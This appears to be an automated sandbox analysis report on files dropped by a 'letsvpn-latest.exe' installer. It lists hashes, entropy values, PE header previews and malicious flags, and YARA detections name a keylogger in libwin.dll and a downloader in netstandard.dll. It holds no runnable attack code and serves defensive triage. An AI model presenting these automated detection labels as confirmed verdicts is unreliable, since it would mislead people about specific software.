SSDEEP:	384:KEZLkwA5qKV3XWe6lWrypwKANynsAw/98E9VF3AM+o/RjPB:PxkwAlagAw/KENAMxprB
MD5:	63B58F8B1E0BE713BCFE9DAFC9176CC2
SHA1:	B89CDFEA822B0FA430EB876371DE7497D32CF02E
SHA-256:	28EC6D09F13B0BC08F60B5CA44589EDD5C8DCA987F0CA8F6ADD37B53FAD4C764
SHA-512:	6C961FEED34104A3679980979F1C3DD3ED54939E3F52AD0CD4352FAAE271A5BBCBB9494BE59A30D824783A3EAE5AC07B0097FD1F9E20648AC3350032CE6A3B12
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............8... ...@....... ..............................=.....@.................................D8..O....@...............$...+...`......(8............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................x8......H.......P ...............%.......7......................................BSJB............v4.0.30319......l...D...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\de\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.733717681243628
Encrypted:	false
SSDEEP:	384:LqmGsHW08We6lWwSpwKANynsAw/98E9VF3AM+ooe6fM:LBGsH1xfAw/KENAMxFIM
MD5:	35769612C2125805C6C002DB0109F357
SHA1:	EDFB7903D5ED6C8DC411F42B9F0144909D6E44A1
SHA-256:	74A973702CC39F0320162D3DB2F0E1BB1BF8AA01C301D43C79FD95C91136796E
SHA-512:	F5EA44073C2B842713BC19CD8A9A6499F444E25D94E2B6C5E87CAE46D59DC96A0B1611ECC15BC2349044E39B1FCFA46784C55CD2CC08974F4C4254A68F167997
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G),..........." ..0..............9... ...@....... ..............................E~....@..................................9..O....@...............$...+...`.......9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%..8....9......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3....................................../.......................u...........].....].....]...D.]...a.].....]...-.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\es\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.695566503181327
Encrypted:	false
SSDEEP:	384:R11LpDt4We6lWUXpwKANynsAw/98E9VF3AM+oHoPZ4:TBdiAw/KENAMxx
MD5:	9E7010EDC447D4E8D1429BBB34B4A806
SHA1:	F863DD49B6FB75F29C0CCE64041177C7185D4B59
SHA-256:	EBE39DC3B6E29646EA4D0BD204D9084CE3155D35B798EB3AA1CAFDB18BF4992E
SHA-512:	334E43A34D5B5123AB24E26CCBD94421E1F29534D68125F8545EE70ABE28EC2E9461559CF6556578960FBBDC880F7BB1557CB462A24C6A4D0C03AE7026F64F2B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k2............" ..0.............69... ...@....... ..............................Z.....@..................................8..O....@...............$...+...`.......8............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%..x...H8......................................BSJB............v4.0.30319......l...D...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\fr\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.739864564293847
Encrypted:	false
SSDEEP:	384:XsxhehdMDxbFWe6lWYFpwKANynsAw/98E9VF3AM+oM2yA7:8vy+DAUAw/KENAMx8+
MD5:	AB8DC70D51CBD593FDEB3072E593A262
SHA1:	49332688646ABD689F4451B8E0D864E0E0D7EFD2
SHA-256:	E5888ECEBA76225AE16540A762A86872FDF389D0DB59AA223B6B6671CBE10FA2
SHA-512:	DDA3F048D9CC5F445B311A3CB725F910DF3B2AD4CAC80818AA0D75EB8D38734892246FA6F84476563B75DF0F28657B41784CBE78FD1BEAF2648D6D0845CD331C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,E..........." ..0..............9... ...@....... ..............................[.....@.................................`9..O....@...............$...+...`......D9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................l.............

C:\Program Files (x86)\letsvpn\app-3.7.0\it\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.699936777322151
Encrypted:	false
SSDEEP:	384:D9WLKzFWe6lWo+pwKANynsAw/98E9VF3AM+oWKdprJw:xgKz+LAw/KENAMxrdxW
MD5:	C8EDE833D2149C6F3DC4BB5F39FB9E2B
SHA1:	BD2BADE2EB45AA6C3DC1B5FB32C81C40FC53579B
SHA-256:	45D6B661D5697E90A03BACA66A6BF059A4F90C1D54529236F9ACFACB7C35BA75
SHA-512:	79B91099688D6093211A65AA446A2C9FCBC87B8A710FE146D7B5164E179BFEDAE7B9C5607F5C46FD1947988F66733EB0FA1D4C450CAE6EAEBC953B69D4CDCECD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(............." ..0..............9... ...@....... ...............................,....@.................................09..O....@...............$...+...`.......9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................d9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\ja\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	21480
Entropy (8bit):	6.860368489378448
Encrypted:	false
SSDEEP:	384:wNeZmFLRnyGO00Ik4oF3eUntWe6lWEppwKANynsAw/98E9VF3AM+ocKyWDe:wQZmFLRnyGO00Ik4oF3eUnGEAw/KENAJ
MD5:	2510E5DE6A78E23F5E5716A947692FCB
SHA1:	C82F7F60598B684D72BB7862EE988E0C8A3E4D60
SHA-256:	DC48E81DBD27F031F5D94BD9F52023D93387295CC03F2F4EFFF50B4C2305FAE7
SHA-512:	FE1890747348E6B4FEC06090DAFC1093E30F3BB9ECC402E80D6E5C36F99BCB2F1C1913904EE8062C610AB0EFBB92E4E9456BCFCB4822C589B8B6A0E99E61507B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............2=... ...@....... ....................................@..................................<..O....@...............(...+...`.......<............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H.......P ...............%..p...D<......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3....................................../.......................u...........].....].....]...D.]...a.].....]...-.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\ko\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20968
Entropy (8bit):	6.868432230037487
Encrypted:	false
SSDEEP:	384:7QP73AIGoWe6lWiEpwKANynsAw/98E9VF3AM+onVHtH:7K7AIGN/Aw/KENAMxVl
MD5:	EFD2B4E0CEFB40944FCF85A8B4F4CAC4
SHA1:	D64794EED481D047ADECD3D75A74D312709B0A7A
SHA-256:	90EE6104D6F200B830D4B0D2416A769F6E60028A15CFBC0F65DF002FAF22171F
SHA-512:	68A0C7AD93155DFB58ECA9234FDEFE0DF3BA5AC109A19C5CF61BF889E77F85B9AF7485835E2E3F5BEDF6411D222512915D8EA970EC1D8390F71D18832BE6CE8B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9..........." ..0.............2;... ...@....... ..............................ER....@..................................:..O....@...............&...+...`.......:............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H.......P ...............%..p...D:......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................l.............

C:\Program Files (x86)\letsvpn\app-3.7.0\libwin.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	10637288
Entropy (8bit):	6.356201019347204
Encrypted:	false
SSDEEP:	98304:n0te2AQgbNlwrsN3iMkgVJyCCex3Xjl4VsdCm5G2p:0teW5lgbyu5Ty7mDp
MD5:	18ACE27FD087E225E3CDAC160EFDAFDD
SHA1:	8944171F8BF3B3738E30EA54B6CAC4C18D8488EA
SHA-256:	8000D8CD4E6C60B420DA110E8D28D262109BA0C2FDFA620021689A4C3F79B46C
SHA-512:	392192A200ED07DF75B3DA5B9FDF2E9EBBFD087D969C5FCBFCAA9B8BEC1F02216323132AF950BAD41D4C351FE4BEEA59AEB6B33EC53342836C84102CE28B748F
Malicious:	false
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Program Files (x86)\letsvpn\app-3.7.0\libwin.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...)..K.. ...:............K...8b...............................6T....@... ......................0..D....@..$....p...............$...+......(E.................................................\|A..@............................text.....K.......K.................`..`.data...l.....K.......K.............@....rdata..\|PN...O..RN..pO.............@..@.bss.....9..............................edata..D....0.....................@..@.idata..$....@.....................@....CRT....,....P.....................@....tls.........`.....................@....rsrc........p.....................@..@.reloc..(E.......F.................@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\log4net.config

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3607
Entropy (8bit):	6.27044188314989
Encrypted:	false
SSDEEP:	96:l22xKLORF1pb5YrJWox7aI94UnvQdmrZ/xEKxD5q8fANY2Z:l22XFbawo1BvecZ/xXxF3INYY
MD5:	28F9077C304D8C626554818A5B5F3B3A
SHA1:	A01F735FE348383795D61AADD6AAB0CC3A9DB190
SHA-256:	746B5675EA85C21EF4FCC05E072383A7F83C5FE06AAA391FC3046F34B9817C90
SHA-512:	485C175BC13C64601B15243DAECBF72621883C2FF294852C9BBB2681937F7EF0BEA65361E0F83131EC989432326442EF387C1CCF2A7CA537C6788B8FD5C0021E
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" ?>..<configuration>... Level........ -->... None > Fatal > ERROR > WARN > DEBUG > INFO > ALL-->... .....level.ERROR...cs......log4net.info()..............-->...<log4net>....<logger name="logger">.....<level value="ALL" />.....<appender-ref ref="LogAppender" />....</logger>.... ........-->.... <appender name="LogAppender" type="log4net.Appender.RollingFileAppender">-->....<appender name="LogAppender" type="log4net.Appender.RollingFileAppender">.....<param name="File" value="Log\\" />.....<param name="AppendToFile" value="true" />.....<param name="MaxFileSize" value="10240" />.....<param name="MaxSizeRollBackups" value="100" />.....<param name="StaticLogFileName" value="false" />.....<param name="DatePattern" value="yyyyMMdd".log"" />.....<param name="RollingStyle" value="Date" />..... ......-->.....<layout type="lo

C:\Program Files (x86)\letsvpn\app-3.7.0\log4net.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	281576
Entropy (8bit):	5.699994218705734
Encrypted:	false
SSDEEP:	3072:4G0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCB:4JrycoB3HVeESME3pnaVTS1nh7hCauhR
MD5:	4A8525BF095DDAD4B988A03165584268
SHA1:	9DA5E7D7B40AB4FDA89EFCF9A12546D6DE9D40A5
SHA-256:	1D721DFDAE218873C411FC939CED1B12486B393A6C810C588342DD008F85FA3F
SHA-512:	6D763186C569FAB20BD51AEFC4F1B030EB9953097E7EAC024FEDD0498E45A8C6C6D59AE6729795DBD4E657F3DE9C17675B7F120FBE569F81C65033EC08E7FE53
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p3..........." ..0...... ........... ... ....... .......................`......1\|....`.................................h...O.... ............... ...+...@......L................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\microsoft.identitymodel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1108968
Entropy (8bit):	5.831773521730096
Encrypted:	false
SSDEEP:	24576:t1WtBetKEfrsial0WV1pqfy+Jp15yKn6GyD:StBetKEfrsial0WV7215yKn6G4
MD5:	7B43C92114F7B7BB57B5AEB2BC7E9344
SHA1:	F36A064C92B1A73048818ED78BD408F441C1BDC5
SHA-256:	4A47C46A9ACDBD5A1DB9ECA17F0453710633B9A85748C45FC83F9B3B09E254D0
SHA-512:	A9A42A65FF2393313FC6F82B13DB8E859AC4B717B729D561B6AE5AD3E90A732DB565D2C3164381E9B66CF72A26158340C81ED0A290D3CA1FE937E5C27DBF2C16
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..\...........!......... ......N.... ........@.. ..............................3.....@.....................................W.......0................+..........P................................................ ............... ..H............text...T.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\netstandard.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	93672
Entropy (8bit):	5.518790914667912
Encrypted:	false
SSDEEP:	1536:x2Ec05j4eAH64rh5fSt5T9nFcI94WxAwrxo:glK4eA7mDmWxhK
MD5:	668EAEC427F8A4C3D57E8A580B0E2C73
SHA1:	91EBE1C270DE93C66FA8713675CA3CD595B80909
SHA-256:	EC365F7AFB9B44FC128D6327A17D4A1D1201F34E36ACA5DDF5D8055498BCA96E
SHA-512:	A3DBCEB380621F621722D2B9B2535ECE9AFF950A5038F4F99FCD6BB75F09B3527C2EBA664A4EE4DF3B86B52068E3CB85F84156056D9A155D6BC57D34A6F0C19F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\app-3.7.0\netstandard.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ....................................@..................................U..O....`..,............B...+........................................................... ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...\|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M....M....M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................

C:\Program Files (x86)\letsvpn\app-3.7.0\pl\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.786590669634782
Encrypted:	false
SSDEEP:	384:cnss4wvEmF+4wpwlU+nACUOWe6lWAqpwKANynsAw/98E9VF3AM+oN2am:cn/PArHAw/KENAMxQB
MD5:	A034D19DDC69D985BC6E6F4542258CB6
SHA1:	57F1A9AEB02522379AD005C2F3064E6BA0AAEB9C
SHA-256:	47DC867FAA75E90302A764CCB8E309008CD24FE3AED89AD2FE2AE69FC6A199A0
SHA-512:	74C4A4AEF3650786791495A2D1023829A92872E80DAB5206AD6C0C489E759C73544263C202342A959A6E7D8BF374B3DBFAAD7AC915ACF861236B7838B7A9B203
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I............." ..0..............9... ...@....... ....................................@.................................x9..O....@...............$...+...`......\9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........].....].....]...A.]...^.].....]...*.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................Z.............

C:\Program Files (x86)\letsvpn\app-3.7.0\pt-BR\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.711860474257598
Encrypted:	false
SSDEEP:	384:MqXQfVeSN32XFZWe6lW0UZpwKANynsAw/98E9VF3AM+oqTthC:Mg0Vyig4Aw/KENAMxGI
MD5:	816AA76B470505EB57B1AC780CC938AF
SHA1:	2DCD6B287BBA995086874D676D3A5816FE3376BF
SHA-256:	DAC4959224188439661696FF3BEA86B1C20F172F4E60358EE60522F21F5FC1F9
SHA-512:	F29D4490429AB8EE05186BC198F89A4495D20681D39CD8FAB027678FBABE26FB7EFFD48D0AD60388B87FFA93A2EFAE99757B394515F93FD439FA0F501116C538
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0.............V9... ...@....... ..............................(W....@..................................9..O....@...............$...+...`.......8............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................89......H.......P ...............%......h8......................................BSJB............v4.0.30319......l...D...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................2.......................x...........`.....`.....`...G.`...d.`.....`...0.`.................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\ru\LetsPRO.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	76776
Entropy (8bit):	5.911997633120142
Encrypted:	false
SSDEEP:	1536:wzaor6WtGrIHOHfufUGBLR+gP8874zGgSmj40sqXz2RgUgmcAwrxVgq:kHBV+gP8874zGgSmjwqXz2RgUgmchsq
MD5:	3575DE62FE6E8E298CF383F0C207B6BB
SHA1:	D2C575E4269C6481A83B3569CF9CEA9616B1454E
SHA-256:	09A9C121C4333EB77A371A58B21EFE009280FAD654BA4E0283ABD81DA7F9217B
SHA-512:	4A145A4369C95FE863F99A35109940C7186DABF7DD9DFC56A150E6923C19C9DD646E875A9AB85FAF3DC90359323BD0CFB73C8DF83B150B432440ED32F6B0DC45
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....};f...........!................^.... ... ....... .......................`......y4....@.....................................O.... ...................+...@....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................@.......H...........$...........P .............................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.4.E.:.....u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....J.[..H.......1..&...+.@..s.............7.Tk[......ue./.N..:...v....F.b.b.S^m.........pE...k....D.../L.e..-...<r.......a...........

C:\Program Files (x86)\letsvpn\app-3.7.0\ru\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	21992
Entropy (8bit):	6.747265377557041
Encrypted:	false
SSDEEP:	384:A8knfHjuXOQWe6lWddpwKANynsAw/98E9VF3AM+oh1r57:ZAuXO1BAw/KENAMx/57
MD5:	A000E17C48AFF375A9D5DAE4637E6D9C
SHA1:	31B1589DA8BD4E84FB9F4D3F67905A0361189B85
SHA-256:	E033AD89A82E6EF1CCB82270C98A7D899E93386F8566F6D662ABA1241B0D46AE
SHA-512:	626C30E90E9EDBB73A07D1DBC16919BC39B2A46E249B17A1D8D188A315D3733B1CDA2F0C4689DF68B7D1B5FD7EFF2799CAC4989E32885FB65BF1ADF1B84E1F98
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(............." ..0.. ...........>... ...@....... ....................................@..................................>..O....@..................+...`.......>............................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H.......P ...............%..8....>......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z....Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-arm\native\e_sqlite3.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) ARMv7 Thumb, for MS Windows
Category:	dropped
Size (bytes):	905704
Entropy (8bit):	7.13132834632752
Encrypted:	false
SSDEEP:	24576:KoXErM5iD28EYQg502GXoU5C0ParRvbLhP:zXriD28xj52X7arp5
MD5:	785ADFB1D1268995620F5F2B8E8D00EE
SHA1:	A54E349EE1DE7BCD57B239D61B8ED714F3471778
SHA-256:	7873A0DE5DADE79E12899A20D8218FAE100110FFBCA0F516E8249B7F528DF3AE
SHA-512:	A52BB4C7D3446394706692F71A8F77D493DA2AEE356520BF1B10A2BCCDEEA24D8DD6BA227C1152D56732C52F03DA8014E9B15966E4092DEF2753A4C90BF50F9C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`^ .$?N.$?N.$?N..WK..?N..WJ.?N..WO.'?N.$?O..?N.%RK.9?N.%RJ.)?N.%RM.?N..RJ.&?N..RN.%?N..R..%?N..RL.%?N.Rich$?N.........PE........^.........."!........................ ......................................R.....@A............................"......(............@..hO.......+.......?..0l..T............................l............... ...............................text............................... ..`.rdata..B.... ......................@..@.data...<J.......>..................@....pdata..hO...@...P..................@..@.rsrc................d..............@..@.reloc...?.......@...f..............@..B........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-x64\native\e_sqlite3.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314280
Entropy (8bit):	6.546943837506406
Encrypted:	false
SSDEEP:	24576:dwDD7AuRNZxBNzFlbZcN16AL9hwYi20TAg7wkPL3:dIDbR1L/m9KYixcW7
MD5:	938A6FE5476FCEE6EA9E84989ACE173C
SHA1:	A73BA1BA2E14E7BD63511A9117537B27D3830193
SHA-256:	CB5CA40D259E44F3EB81F91C1662F7FFED539460DC6850EDB13207D3F4BDB878
SHA-512:	05C0035DC84BBD1E35391B0C3E52F93EE03629BEAB7095A3E1A854D8CC1A689ED789FA78370CD3424B4783F4EE04EFF883AEDA10CDCB474CFB99BCDCDD04B00D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.[.~.5.~.5.~.5.%.1.u.5.%.6.v.5.%.0...5.%.4.}.5.~.4...5...0.`.5...1.p.5...6.v.5..1.\|.5..5...5......5..7...5.Rich~.5.........PE..d.....^.........." ................P........................................P......z.....`A........................................ ...."..(...(.... .......@..h........+...0..........T............................................................................text............................... ..`.rdata..............................@..@.data....i.......T..................@....pdata..h....@......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-x86\native\e_sqlite3.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1029608
Entropy (8bit):	6.749777649807674
Encrypted:	false
SSDEEP:	24576:rBvdKGB6hOsMxCmy+rAnpyAqhTz3RzVNUOxKKoSQd:NvdKGBmWNAnpc3Rz1KKoS8
MD5:	EE9E953ADF3EC9EEBA38CB55A5F3DC52
SHA1:	9FE2E4C80D731131A3284E4C22C137CFC669CF55
SHA-256:	78B7CBE99FFA1BF2DEFBE87FD219246DA55F5A677D7E60453A0EA3CF91F2D2A3
SHA-512:	554F0FCFA4181E243BF52015075498A17E2498623860F0BFAEA81BDD4F94286EDC69F43E1E6B164052040E3D1872A5718501EC8F877B0C5888370714555A91A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E......................#.....................2...........................z.......z.......z.......z.......Rich............................PE..L.....^...........!.....R...B..............p......................................pQ....@A........................ ...."..(...(....`...................+...p...\......T...........................(...@............p...............................text....Q.......R.................. ..`.rdata..z....p.......V..............@..@.data....K.......>..................@....rsrc........`.......*..............@..@.reloc...\...p...^...,..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\tr\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.6984022574942355
Encrypted:	false
SSDEEP:	384:ffH3xC8M83We6lWnTpwKANynsAw/98E9VF3AM+otxJTFXG:3c8M8YFAw/KENAMxrrG
MD5:	91AE72A8E53FA3669B56FE855EE217EB
SHA1:	3C15EFF5FB84420548FE9F162BF22E5AA775BB0C
SHA-256:	CAD300B595907682762CC2EBAF9C856F54A37D4373A6D96A5FF1C6113532179F
SHA-512:	EDC220CAD9A55F724BA43912D89F22CDAE56BDFC65A3E19040E54FCCB82443C532516FC585409CCE4496116D656B345420CCC737BBD0FB880A4BBB39A5B8D210
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S............." ..0.............J8... ...@....... ..............................AY....@..................................7..O....@...............$...+...`.......7............................................... ............... ..H............text...P.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................,8......H.......P ...............%......\7......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................r.............

C:\Program Files (x86)\letsvpn\app-3.7.0\x64\WebView2Loader.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	138728
Entropy (8bit):	6.191078705692302
Encrypted:	false
